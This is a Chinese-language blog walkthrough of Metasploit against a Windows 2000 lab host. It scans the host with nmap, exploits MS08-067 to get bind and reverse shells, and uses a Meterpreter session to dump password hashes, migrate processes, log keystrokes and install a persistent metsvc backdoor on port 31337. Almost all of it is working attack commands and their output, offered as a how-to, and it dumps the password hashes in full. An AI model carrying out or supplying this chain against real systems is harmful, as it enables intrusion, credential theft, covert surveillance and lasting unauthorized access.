实例学习Metasploit的使用

# 一个比较完整的metasploit基础资料。

 

 

本文包括使用Metasploit端口扫描，操作系统探测，漏洞检测，漏洞利用，开启后门的介绍

参考资料：BackTrack 4 Assuring Security by Penetration Testing

关于Metasploit的介绍我就不多说了，用百度搜索一下有很多

示范的漏洞是MS08-067,是一个比较老的漏洞了，系统也很老——Windows 2000 AdvancedSever。本文主要目的是为了介绍Metasploit的使用，MS08-067是一个比较容易成功的实例，所以就选择这个了。

###################实验环境介绍####################

被攻击主机：

OS:Windows 2000 AdvancedServer

IP:192.168.200.140

攻击者主机：

OS:BT5 R1

IP:192.168.200.148

##################入侵前的准备工作：端口扫描、漏洞检测##################

因需要用到db_nmap命令，查看当前的数据库连接状态

msf > db_status

postgresql connected to msf3

可以，看到当前已经连接到数据库postgresql

 

msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.200.140 

 Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-12-27 01:06 EST

 Nmap: Nmap scan report for 192.168.200.140

 Nmap: Host is up (0.0023s latency).

 Nmap: Not shown: 970 closed ports

 Nmap: PORT     STATE SERVICE       VERSION

 Nmap: 25/tcp   open  smtp          Microsoft ESMTP 5.0.2195.6713

 Nmap: 42/tcp   open  wins          Microsoft Windows Wins

 Nmap: 53/tcp   open  domain        Microsoft DNS

 Nmap: 80/tcp   open  http          Microsoft IIS httpd 5.0

 Nmap: 88/tcp   open  kerberos-sec  Microsoft Windows kerberos-sec

 Nmap: 119/tcp  open  nntp          Microsoft NNTP Service 5.0.2195.6702 (posting ok)

 Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC

 Nmap: 139/tcp  open  netbios-ssn

 Nmap: 389/tcp  open  ldap

 Nmap: 443/tcp  open  https?

 Nmap: 445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds

 Nmap: 464/tcp  open  kpasswd5?

 Nmap: 563/tcp  open  snews?

 Nmap: 593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

 Nmap: 636/tcp  open  tcpwrapped

 Nmap: 1026/tcp open  msrpc         Microsoft Windows RPC

 Nmap: 1029/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

 Nmap: 1036/tcp open  mstask        Microsoft mstask (task server - c:winntsystem32Mstask.exe)

 Nmap: 1042/tcp open  msrpc         Microsoft Windows RPC

 Nmap: 1044/tcp open  mstask        Microsoft mstask (task server - c:winntsystem32Mstask.exe)

 Nmap: 1045/tcp open  msrpc         Microsoft Windows RPC

 Nmap: 1051/tcp open  msrpc         Microsoft Windows RPC

 Nmap: 1054/tcp open  msrpc         Microsoft Windows RPC

 Nmap: 1061/tcp open  mstask        Microsoft mstask (task server - c:winntsystem32Mstask.exe)

 Nmap: 1062/tcp open  mstask        Microsoft mstask (task server - c:winntsystem32Mstask.exe)

 Nmap: 1122/tcp open  msrpc         Microsoft Windows RPC

 Nmap: 3268/tcp open  ldap

 Nmap: 3269/tcp open  tcpwrapped

 Nmap: 3372/tcp open  msdtc         Microsoft Distributed Transaction Coordinator (error)

 Nmap: 3389/tcp open  microsoft-rdp Microsoft Terminal Service

 Nmap: MAC Address: 00:0C:29:EA:2C:5D (VMware)

 Nmap: Device type: general purpose

 Nmap: Running: Microsoft Windows 2000|XP|Me

 Nmap: OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2, Microsoft Windows Millennium Edition (Me)

 Nmap: Network Distance: 1 hop

 Nmap: Service Info: Host: 2000adsrven.combatlab.com; OS: Windows

 Nmap: Host script results:

 Nmap: | smb-check-vulns:

 Nmap: |   MS08-067: VULNERABLE

 Nmap: |   Conficker: Likely CLEAN

 Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

 Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

 Nmap: |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

 Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

 Nmap: Nmap done: 1 IP address (1 host up) scanned in 52.73 seconds

使用db_nmap命令，可以看到192.168.200.140的操作系统和可能存在的漏洞，其中包括此次实验的MS08-067.

 

#########################开始入侵###########################

查询并查看有关MS08_067的漏洞信息

msf > search ms08_067

Matching Modules

================

Name Disclosure Date Rank Description

—- ————— —- ———–

exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption

 

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption

Module: exploit/windows/smb/ms08_067_netapi

Version: 12540

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Great

Provided by:

hdm 

 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250

 

http://www.osvdb.org/49243

 

http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

 

NEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)

msf exploit(ms08_067_netapi) >

查看攻击目标主机的需要配置的选项

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.200.140 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

 

Payload options (windows/shell_bind_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC thread yes Exit technique: seh, thread, process, none

LPORT 4444 yes The listen port

RHOST 192.168.200.140 no The target address

 

Exploit target:

Id Name

— —-

0 Automatic Targeting

 

################使用Bind Shell方式#######################

设置相关参数

msf exploit(ms08_067_netapi) > set RHOST 192.168.200.140

RHOST => 192.168.200.140

设置payload

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp

payload => windows/shell_bind_tcp

查看你设置参数的情况

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.200.140 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

 

Payload options (windows/shell_bind_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC thread yes Exit technique: seh, thread, process, none

LPORT 4444 yes The listen port

RHOST 192.168.200.140 no The target address

 

Exploit target:

Id Name

— —-

0 Automatic Targeting

现在开始溢出攻击

msf exploit(ms08_067_netapi) > exploit

• Started bind handler

• Automatically detecting the target…

• Fingerprint: Windows 2000 – Service Pack 0 – 4 – lang:English

• Selected Target: Windows 2000 Universal

• Attempting to trigger the vulnerability…

• Command shell session 2 opened (192.168.200.148:34431 -> 192.168.200.140:4444) at 2011-12-27 01:14:59 -0500

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

成功获得shell！哈哈！！！

 

###########################使用Reverse Shell方式#####################

 

大家知道如果攻击者与被攻击之间有防火墙的话，防火墙会检测TCP连接状态，正向连接可能不会成功。防火墙不能阻止我们攻击的脚步，因为我们还有反向连接

这次我们使用Reverse shell，

msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

payload => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > set LHOST 192.168.200.148

LHOST => 192.168.200.148

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.200.140 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

 

Payload options (windows/shell_reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST 192.168.200.148 yes The listen address

LPORT 4444 yes The listen port

 

Exploit target:

Id Name

— —-

0 Automatic Targeting

 

msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > exploit

• Started reverse handler on 192.168.200.148:4444

• Automatically detecting the target…

• Fingerprint: Windows 2000 – Service Pack 0 – 4 – lang:English

• Selected Target: Windows 2000 Universal

• Attempting to trigger the vulnerability…

• Command shell session 3 opened (192.168.200.148:4444 -> 192.168.200.140:2226) at 2011-12-27 01:20:55 -0500

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

同样成功获得shell，哈哈

我们可以看到，设置Reverse Shell并不是很复杂，和bind shell相比只需要多设置一个本地地址LHOST就可以了

######################功能强大的meterpreter##########################

下面介绍的是Meterpreter

A meterpreter is an advanced, stealthy, multifaceted, and dynamically extensible

payload which operates by injecting reflective DLL into a target memory. Scripts

and plugins can be dynamically loaded at runtime for the purpose of extending

the post-exploitation activity. This includes privilege escalation, dumping system

accounts, keylogging, persistent backdoor service, enabling remote desktop, and

many other extensions. Moreover, the whole communication of the meterpreter shell

is encrypted by default.

英文我就不翻译了，不献丑了。总而言之，言而总之，meterpreter是一个很强大的工具。

我们把payload设置为meterpreter

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.200.140 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

 

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST 192.168.200.148 yes The listen address

LPORT 4444 yes The listen port

 

Exploit target:

Id Name

— —-

0 Automatic Targeting

 

msf exploit(ms08_067_netapi) >

通过show options获得信息可以看到，需要设置的参数和Reverse_Shell没有什么区别（注意这里RHOST和LHOST参数是使用以前的，没有再设置）

但是meterpreter要比Shell功能强大多了

msf exploit(ms08_067_netapi) > exploit

• Started reverse handler on 192.168.200.148:4444

• Automatically detecting the target…

• Fingerprint: Windows 2000 – Service Pack 0 – 4 – lang:English

• Selected Target: Windows 2000 Universal

• Attempting to trigger the vulnerability…

• Sending stage (752128 bytes) to 192.168.200.140

• Meterpreter session 4 opened (192.168.200.148:4444 -> 192.168.200.140:2238) at 2011-12-27 01:29:29 -0500

meterpreter >

打个问号，看看我们能做什么

meterpreter > ?

Core Commands

=============

Command Description

——- ———–

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information about active channels

close Closes a channel

detach Detach the meterpreter session (for http/https)

disable_unicode_encoding Disables encoding of unicode strings

enable_unicode_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

help Help menu

info Displays information about a Post module

interact Interacts with a channel

irb Drop into irb scripting mode

load Load one or more meterpreter extensions

migrate Migrate the server to another process

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

use Deprecated alias for ‘load’

write Writes data to a channel

 

Stdapi: File system Commands

============================

Command Description

——- ———–

cat Read the contents of a file to the screen

cd Change directory

del Delete the specified file

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lpwd Print local working directory

ls List files

mkdir Make directory

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

upload Upload a file or directory

 

Stdapi: Networking Commands

===========================

Command Description

——- ———–

ipconfig Display interfaces

portfwd Forward a local port to a remote service

route View and modify the routing table

 

Stdapi: System Commands

=======================

Command Description

——- ———–

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process

getuid Get the user that the server is running as

kill Terminate a process

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

sysinfo Gets information about the remote system, such as OS

 

Stdapi: User interface Commands

===============================

Command Description

——- ———–

enumdesktops List all accessible desktops and window stations

getdesktop Get the current meterpreter desktop

idletime Returns the number of seconds the remote user has been idle

keyscan_dump Dump the keystroke buffer

keyscan_start Start capturing keystrokes

keyscan_stop Stop capturing keystrokes

screenshot Grab a screenshot of the interactive desktop

setdesktop Change the meterpreters current desktop

uictl Control some of the user interface components

 

Stdapi: Webcam Commands

=======================

Command Description

——- ———–

record_mic Record audio from the default microphone for X seconds

webcam_list List webcams

webcam_snap Take a snapshot from the specified webcam

 

Priv: Elevate Commands

======================

Command Description

——- ———–

getsystem Attempt to elevate your privilege to that of local system.

 

Priv: Password database Commands

================================

Command Description

——- ———–

hashdump Dumps the contents of the SAM database

 

Priv: Timestomp Commands

========================

Command Description

——- ———–

timestomp Manipulate file MACE attributes

meterpreter >

看到了吧，很强大！

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > sysinfo

Computer : 2000ADSRVEN

OS : Windows 2000 (Build 2195, Service Pack 4).

Architecture : x86

System Language : en_US

Meterpreter : x86/win32

获得当前的系统信息

meterpreter > hashdump

Administrator:500:01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::

GuestVD:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d26ef143374b85e088e8fd6cfa23b6c3:::

TsInternetUser?:1000:93d52434d77e49a5254ddde1f8ceea44:0a9fbeb0dcb3920a5a998dc4235b4091:::

IUSR_2000ADSRVEN:4:1001:24efe7c8a2d071151ae80e959ed56390:5f2d4a0bff72b9bff9711c1a19938de7:::

IWAM_2000ADSRVEN:1002:6d64ce9c9d6ebf8252e3494ee397943f:98f07977d5ad5ec292f37d75b8b9a037:::

2000ADSRVEN$:1007:aad3b435b51404eeaad3b435b51404ee:cc4caad1a7288661ac9f70c9207436cc:::

获得hash值了，也就意味着基本上获得了用户名密码

meterpreter > ps

Process list

============

PID Name Arch Session User Path

— —- —- ——- —- —-

0 [System Process] x86

8 System x86 0 NT AUTHORITYSYSTEM

160 smss.exe x86 0 NT AUTHORITYSYSTEM SystemRootSystem32smss.exe

184 csrss.exe x86 0 NT AUTHORITYSYSTEM ??C:WINNTsystem32csrss.exe

208 winlogon.exe x86 0 NT AUTHORITYSYSTEM ??C:WINNTsystem32winlogon.exe

236 services.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32services.exe

248 lsass.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32lsass.exe

348 termsrv.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32termsrv.exe

468 svchost.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32svchost.exe

496 SPOOLSV.EXE x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32spoolsv.exe

668 msdtc.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32msdtc.exe

816 dfssvc.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32Dfssvc.exe

836 svchost.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32svchost.exe

868 ismserv.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32ismserv.exe

888 llssrv.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32llssrv.exe

936 ntfrs.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32ntfrs.exe

1004 regsvc.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32regsvc.exe

1016 locator.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32locator.exe

1028 mstask.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32MSTask.exe

1100 winmgmt.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32WBEMWinMgmt.exe

1132 wins.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32wins.exe

1144 svchost.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32svchost.exe

1160 dns.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32dns.exe

1180 inetinfo.exe x86 0 NT AUTHORITYSYSTEM C:WINNTsystem32inetsrvinetinfo.exe

1844 svchost.exe x86 0 NT AUTHORITYSYSTEM C:WINNTSystem32svchost.exe

1820 explorer.exe x86 0 COMBATLABAdministrator C:WINNTExplorer.EXE

664 wuauclt.exe x86 0 COMBATLABAdministrator C:WINNTsystem32wuauclt.exe

 

meterpreter > migrate 1820• Migrating to 1820…

• Migration completed successfully.

meterpreter > getuid

Server username: COMBATLABAdministrator

权限迁移成功，从SYSTEM权限迁移到Administrator权限

meterpreter有键盘记录功能

使用keyscan_start开启键盘记录功能，使用keyscan_dump,显示记录的内容。使用keyscan_stop关闭该功能。

meterpreter > keyscan_start

Starting the keystroke sniffer…

meterpreter > keyscan_dump

Dumping captured keystrokes…

Junbao is a nice guy s 

meterpreter > keyscan_stop

Stopping the keystroke sniffer…

########################使用Meterpreter获得后门####################

入侵成功后，如何建立后门？

强大meterpreter工具，可以提供这种功能。

meterpreter > run metsvc -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the service

-h This help menu

-r Uninstall an existing Meterpreter service (files must be deleted manually)

 

meterpreter > run metsvc • Creating a meterpreter service on port 31337

• Creating a temporary installation directory C:DOCUME~1ADMINI~1LOCALS~1TempEkQASdimbMldN…

• >> Uploading metsrv.dll…

• >> Uploading metsvc-server.exe…

• >> Uploading metsvc.exe…

• Starting the service…

* Installing service metsvc

* Starting service

Service metsvc successfully installed.

后门建立成功。

########################后门利用########################

后门如何利用啊？

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/metsvc_bind_tcp

payload => windows/metsvc_bind_tcp

msf exploit(handler) > set LPORT 31337

LPORT => 31337

msf exploit(handler) > set RHOST 192.168.200.140

RHOST => 192.168.200.140

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

—- ————— ——– ———–

 

Payload options (windows/metsvc_bind_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC process yes Exit technique: seh, thread, process, none

LPORT 31337 yes The listen port

RHOST 192.168.200.140 no The target address

 

Exploit target:

Id Name

— —-

0 Wildcard Target

 

msf exploit(handler) > exploit

• Started bind handler

 

• Starting the payload handler…

• Meterpreter session 1 opened (192.168.200.148:57009 -> 192.168.200.140:31337) at 2011-12-27 02:02:58 -0500

meterpreter >

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

 

posted in Pentest by pen